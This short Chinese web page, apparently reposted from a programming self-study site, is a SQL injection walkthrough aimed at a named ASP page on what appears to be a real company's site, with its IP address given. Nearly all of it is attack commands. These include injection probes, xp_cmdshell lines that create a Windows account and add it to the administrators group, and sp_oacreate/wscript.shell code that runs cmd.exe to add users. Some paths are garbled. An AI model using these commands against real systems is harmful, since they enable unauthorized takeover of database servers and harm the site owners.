注入点: asp ">http://HdhCmsTestenzymotec测试数据/Page.asp cc=0102041102 IP:192.117.122.145 以色列 inurl:asp 具体脚本命令: 1.判断是否有注入;and 1=1 ;and 1=2 ;and user_name()=dbo 判断当前 系统 的连接用户是不是sa 2.添加系统的管理员 ;exec master.dbo.xp_cmdshell net user jiaozhu jiaozhu /add;-- ;exec master.dbo.xp_cmdshell net localgroup administrators jiaozhu /add;--
declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c: windows system32cmd.exe /c 这段命令是通过SQL执行系统命令的 例如: declare @shell int exec sp_oacreate wscript.shell,@shell output exec sp_oamethod @shell,run,null,c:windowssystem32cmd.exe /c net user jiss 111 /add 这段命令是通过SQL执行系统命令的
查看更多关于SA权限添加管理员帐号 - 网站安全 - 自学php的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did11164